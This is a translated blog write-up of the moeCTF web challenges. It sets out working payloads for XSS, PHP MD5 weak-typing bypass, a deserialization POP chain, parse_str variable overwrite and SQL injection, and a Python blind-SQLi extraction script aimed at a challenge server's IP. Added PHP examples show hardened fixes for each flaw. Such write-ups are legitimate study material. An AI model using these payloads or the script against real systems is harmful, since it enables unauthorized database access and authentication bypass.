Northwest University moeCTF - Web

Preface

A CTF platform I found a long time ago; I stumbled on it again today and there were still a few web challenges left, so I might as well clear them...

Robots

Clearly about the robots exclusion protocol (robots.txt)

http://47.93.187.174/nwuctf/robots.txt

Request the file directly to get the flag

nwuctf{robots_is_NOT_RobotQAQ}

Let's pop a flag

As the title suggests, pop a flag: enter <script>alert('flag')</script> in the input box and the flag appears

PHP weak typing

View the source

```php
<?php
$s = $_GET['s'];
$a = 'QNKCDZO';
$md5a = md5($a);
$md5s = md5($s);
if($s != $a && $md5a == $md5s){
    echo $flag;
}else{
    echo 'try again';
}
```

Pass s via GET such that s is not equal to a but md5(s) equals md5(a). The loose comparison == only compares the values of the variables, not their types. The MD5 of the given $a starts with 0e, and because the rest of the digest is all digits the whole string is numeric, so PHP reads it as scientific notation (0 times a power of ten, i.e. 0). We therefore only need another string whose MD5 also starts with 0e and is otherwise all digits
payload:

?s=s878926199a
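Why the check passes and how it should have been written, as an added example that is not part of the writeup or the challenge source. It uses the two strings from this section; md5(), is_numeric() and hash_equals() are standard PHP functions.

```php
<?php
// Added example (not the challenge's code): loose vs. strict comparison of two MD5 digests.

// The two inputs from the writeup: both digests begin with "0e" followed only by digits.
$a = 'QNKCDZO';
$s = 's878926199a';

function loose_match(string $x, string $y): bool
{
    // "==" sees two numeric strings and compares them as numbers:
    // "0e<digits>" is 0 * 10^<digits>, i.e. 0.0, on both sides.
    return md5($x) == md5($y);
}

function strict_match(string $x, string $y): bool
{
    // hash_equals compares byte for byte (and in constant time), so two
    // different digests never compare equal. "===" would also do.
    return hash_equals(md5($x), md5($y));
}

printf("md5(%s) = %s\n", $a, md5($a));
printf("md5(%s) = %s\n", $s, md5($s));
var_dump(is_numeric(md5($a)), is_numeric(md5($s)));   // why "==" falls back to numeric comparison
var_dump($s != $a && loose_match($a, $s));            // the challenge's check
var_dump($s != $a && strict_match($a, $s));           // the hardened check
```

Run it with the php CLI: the loose check reports true and the strict one false. Note that PHP only compares two strings numerically when both are numeric strings in their entirety, which is why a digest such as 0e followed by any letter would not have triggered the bug; a check on hex digests should never use ==.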

An easy SQLi 2

Universal password: username 'or 1=1, any password, out comes the flag

Headers, headers

First set get=flag; the page then says "You must use the IceRabbit browser", so change the User-Agent to IceRabbit Browser. Next it asks "Did you come from google?", so change the Referer to www.google.com and get the flag

Too fast to catch?

Opening the link, you can see the page redirects several times. Fetch the pages with Python and concatenate the information from the three pages to get the flag

PHP deserialization

The home page gives the source

```php
<?php
error_reporting(0);
class hack
{
    public $mod1;
    public function __destruct()
    {
        $this->mod1 = "concat string".$this->mod1;
    }

}
class str
{
    public $str1;
    public function __toString()
    {
        $this->str1->flag();
        return "1";
    }
}
class get_flag
{
    public function flag()
    {
        echo "tql, 给师傅送flag:"."nwuctf{xxxxxxxxxxxxxxx}";
    }
}
$a = $_GET['string'];
unserialize($a);
highlight_file(__FILE__);
?>
```

Build a POP chain: the flag is printed through str's __toString method, which is called automatically whenever the object is used as a string. hack's __destruct concatenates $this->mod1 into a string, so naturally that is the entry point: set mod1 to a str object whose str1 is a get_flag object

Payload code

```php
<?php
class hack
{
    public $mod1;
    public function __construct()
    {
        $this->mod1 = new str;
    }

}
class str
{
    public $str1;
    public function __construct()
    {
        $this->str1 = new get_flag;
    }
}

class get_flag
{
    public function flag()
    {
        echo "tql, 给师傅送flag:"."nwuctf{xxxxxxxxxxxxxxx}";
    }
}

$a = new hack;
$b = serialize($a);
echo $b;
?>
```

payload:

string=O:4:%22hack%22:1:{s:4:%22mod1%22;O:3:%22str%22:1:{s:4:%22str1%22;O:8:%22get_flag%22:0:{}}}
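How the same three classes can be kept while the chain is made inert, as an added example that is not the challenge's or the writeup's code. It assumes PHP 7.0 or later for the allowed_classes option of unserialize(); the echo text in flag() is a placeholder.

```php
<?php
// Added example (not the challenge's code): the challenge's three classes with a
// deserialization entry point that cannot start the hack -> str -> get_flag chain.

class hack
{
    public $mod1;
    public function __destruct()
    {
        $this->mod1 = "concat string" . $this->mod1;   // string context -> __toString
    }
}
class str
{
    public $str1;
    public function __toString()
    {
        $this->str1->flag();
        return "1";
    }
}
class get_flag
{
    public function flag()
    {
        echo "flag() was called\n";   // placeholder for the challenge's echo
    }
}

// The POP chain from the writeup, URL-decoded.
$payload = 'O:4:"hack":1:{s:4:"mod1";O:3:"str":1:{s:4:"str1";O:8:"get_flag":0:{}}}';

function safe_unserialize(string $data)
{
    // allowed_classes => false (PHP >= 7.0): every O:...: token is materialised as
    // __PHP_Incomplete_Class, which has no __destruct/__toString/__wakeup, so none of
    // the application's magic methods run while the result lives or when it is freed.
    return unserialize($data, ['allowed_classes' => false]);
}

$obj = safe_unserialize($payload);
var_dump($obj instanceof __PHP_Incomplete_Class);
unset($obj);   // freed here without any destructor running

// Where the data is user-controlled, the better answer is a format with no
// object semantics at all: json_decode() only ever yields arrays and scalars.
var_dump(json_decode('{"mod1":{"str1":{}}}', true));
```

With allowed_classes set to false the var_dump prints true and "flag() was called" never appears. If an application genuinely needs objects back, allowed_classes takes an explicit list of class names instead of false; anything outside that list is still turned into __PHP_Incomplete_Class.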

If only there were an if

The challenge gives the source

```php
<?php

$flag="nwuctf{xxxxxxxxxxxxxxxxxxxx}";
if (!empty($_SERVER['QUERY_STRING'])) {
    $query = $_SERVER['QUERY_STRING'];
    $res = parse_str($query);
    if (!empty($res['action'])){
        $action = $res['action'];
    }
}
if ($action === 'auth') {
    if (!empty($res['user'])) {
        $user = $res['user'];
    }
    if (!empty($res['pass'])) {
        $pass = $res['pass'];
    }

    if (!empty($user) && !empty($pass)) {
        $hashed_password = hash('md5', $user.$pass);
    }
    if (!empty($hashed_password) && $hashed_password === '22180f07c8d8de04667257a18d9a64c6') {
        echo $flag;
    }
    else {
        echo 'fail :(';
    }
}
else {
    highlight_file(__FILE__);
}
```

Use parse_str to overwrite the hashed_password variable. Called with a single argument, parse_str registers every query parameter as a variable in the current scope (it returns nothing, so $res stays null and the $res[...] lookups never match). Supplying hashed_password in the query string therefore sets $hashed_password directly, and because user and pass are absent it is never recomputed

payload:

action=auth&hashed_password=22180f07c8d8de04667257a18d9a64c6
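The same authentication logic with parse_str() confined to an array, as an added example that is not the challenge's or the writeup's code. It uses the digest from the challenge source; the function name authenticate() and the sample user/pass values are made up.

```php
<?php
// Added example (not the challenge's code): the auth check with parse_str()'s result
// confined to an array, so query parameters cannot create or overwrite local variables.

function authenticate(string $query_string, string $expected_hash): string
{
    $res = [];
    parse_str($query_string, $res);          // two-argument form: fills $res, touches nothing else

    if (($res['action'] ?? '') !== 'auth') {
        return 'no auth';
    }
    // Only accept plain strings; user[]=x would arrive as an array.
    $user = is_string($res['user'] ?? null) ? $res['user'] : '';
    $pass = is_string($res['pass'] ?? null) ? $res['pass'] : '';
    if ($user === '' || $pass === '') {
        return 'fail :(';
    }
    // The digest is always derived from user+pass here; nothing in $res can pre-set it.
    $hashed_password = hash('md5', $user . $pass);
    return hash_equals($expected_hash, $hashed_password) ? 'flag' : 'fail :(';
}

$expected = '22180f07c8d8de04667257a18d9a64c6';   // the digest from the challenge source

// The writeup's payload: hashed_password is now just an unused array key.
echo authenticate('action=auth&hashed_password=' . $expected, $expected), "\n";
// A real user/pass pair (made-up values) still has to hash to the expected digest.
echo authenticate('action=auth&user=alice&pass=hunter2', $expected), "\n";
```

Both calls print "fail :(". The one-argument form of parse_str was deprecated in PHP 7.2 and removed in PHP 8.0, where the challenge source would not run at all; on older versions the second argument is the whole fix, and it is also the reason the original code's $res checks were dead.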

An easy SQLi

Pretty easy, just run sqlmap against it

SQL injection vulnerability

sqlmap isn't a silver bullet ╥﹏╥, so manual injection it is. A quick test shows the following keywords are blocked: order | left | mid | substr | like | = | %23(#) | ascii
So let's inject with right | regexp | --+ instead~
Capturing the request in Burp and brute-forcing the ? part, I suddenly discovered that MySQL is case-insensitive??? WTF!
All the way through I dumped a database name, table name, column name and field value whose case I couldn't tell, which was maddening! Because ascii and ord were filtered and I couldn't find anything useful online, I went straight to the challenge author for a chat. He said case wasn't something he meant to test, just an unintended side effect he couldn't avoid... fine, Orz. Then he sent me a link: just add the keyword binary.

  • Database

    id=1' and right(database(),1) regexp binary '§?§' --+

  • Tables

    id=1' and right((select group_concat(table_name) from information_schema.tables where table_schema regexp "ctf"),1) regexp binary '§?§' --+

  • Columns

    id=1' and right((select group_concat(column_name) from information_schema.columns where table_name regexp "fla49"),1) regexp '§?§' --+

  • Last step of the field dump

    id=1' and right((select group_concat(flag) from fla49),29) regexp binary '§?§wuctf{Her3_is_SQLi_FlaggQWQ}' --+

Of course you can also run a script.
Here is the script I wrote:

```python
import requests as r

# characters tried for each position; the name is built from the right
dic = '_{}-+abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'

def Database():
    global db_name
    db_name = ''
    flag1 = 0
    for i in range(1,50):
        for j in dic:
            url1 = 'http://123.207.166.65/nwuctf/zfgbhjyuk.php?id=1\' and right(database(),'+str(i)+') regexp binary \''+j+db_name+'\' --+'
            #print(url1)
            res1 = r.get(url1)
            if 'hello' in res1.text:
                db_name = j+db_name
                print(db_name)
                break
            if j == '9':        # last character of dic with no hit: the name is complete
                flag1 = 1
        if flag1 == 1:
            print('Database --> '+db_name)
            break

def Table():
    global ta_name
    ta_name = ''
    flag2 = 0
    for i in range(1,50):
        for j in dic:
            url2 = 'http://123.207.166.65/nwuctf/zfgbhjyuk.php?id=1\' and right((select group_concat(table_name) from information_schema.tables where table_schema regexp "'+db_name+'"),'+str(i)+') regexp binary \''+j+ta_name+'\' --+'
            #print(url2)
            res2 = r.get(url2)
            if 'hello' in res2.text:
                ta_name = j+ta_name
                print(ta_name)
                break
            if j == '9':
                flag2 = 1
        if flag2 == 1:
            print('Table_name --> '+ta_name)
            break

def Column():
    global co_name
    co_name = ''
    flag3 = 0
    for i in range(1,50):
        for j in dic:
            url3 = 'http://123.207.166.65/nwuctf/zfgbhjyuk.php?id=1\' and right((select group_concat(column_name) from information_schema.columns where table_name regexp "'+ta_name+'"),'+str(i)+') regexp \''+j+co_name+'\' --+'
            #print(url3)
            res3 = r.get(url3)
            if 'hello' in res3.text:
                co_name = j+co_name
                print(co_name)
                break
            if j == '9':
                flag3 = 1
        if flag3 == 1:
            print('Column_name --> '+co_name)
            break

def Flag():
    flag = ''
    flag4 = 0
    for i in range(1,50):
        for j in dic:
            url4 = 'http://123.207.166.65/nwuctf/zfgbhjyuk.php?id=1\' and right((select group_concat('+co_name+') from '+ta_name+'),'+str(i)+') regexp binary \''+j+flag+'\' --+'
            #print(url4)
            res4 = r.get(url4)
            if 'hello' in res4.text:
                flag = j+flag
                print(flag)
                break
            if j == '9':
                flag4 = 1
        if flag4 == 1:
            print('flag --> '+flag)
            break

if __name__ == '__main__':
    Database()
    Table()
    Column()
    Flag()
```
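Why the keyword filter described in this section could not hold, and the fix that makes such a filter unnecessary, as an added example that is not the challenge's or the writeup's code. The blocked words and the first probe are taken from this section; the table name fla49 and column flag are the ones dumped above, the row content is made up, and an in-memory SQLite database (PDO with pdo_sqlite) stands in for the challenge's MySQL instance.

```php
<?php
// Added example (not the challenge's code): a keyword blocklist like the one the
// challenge used, beside the prepared statement that makes it unnecessary.

function blocklist_allows(string $id): bool
{
    // The words the challenge rejected, per the writeup.
    $blocked = ['order', 'left', 'mid', 'substr', 'like', '=', '#', 'ascii', 'ord'];
    foreach ($blocked as $kw) {
        if (stripos($id, $kw) !== false) {
            return false;
        }
    }
    return true;
}

// The first probe from the writeup: none of the blocked words occur in it,
// so a blocklist on its own lets the injection through.
$probe = "1' and right(database(),1) regexp binary 'a' --+";
var_dump(blocklist_allows($probe));

// Hardened lookup: the id is validated as an integer and bound as a parameter,
// so whatever the string contains is never parsed as SQL.
function fetch_by_id(PDO $pdo, string $id): ?array
{
    if (!ctype_digit($id)) {
        return null;                       // id is numeric by contract; reject anything else
    }
    $stmt = $pdo->prepare('SELECT id, flag FROM fla49 WHERE id = :id');
    $stmt->bindValue(':id', (int)$id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed stand-in for the challenge database.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE fla49 (id INTEGER PRIMARY KEY, flag TEXT)');
$pdo->exec("INSERT INTO fla49 VALUES (1, 'nwuctf{placeholder}')");

var_dump(fetch_by_id($pdo, '1'));        // the normal lookup returns the row
var_dump(fetch_by_id($pdo, $probe));     // rejected before any SQL is built
```

The first var_dump shows that the blocklist accepts the probe: every blocked function has a sibling (right for left, regexp for like, --+ for #), so the list can only ever chase the last payload seen. With ctype_digit and a bound integer parameter there is no string for the database to interpret, and the case-sensitivity detail the author ran into becomes irrelevant to the defender.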

Got run in circles by SQL... dead

Author: Cryscat
Link: http://www.cryscat.com/2019/03/10/西北大学moeCTF-Web/
License: Unless otherwise stated, all articles on this blog are released under the CC BY-NC-SA 4.0 license. Please credit Cryscat's Blog when reposting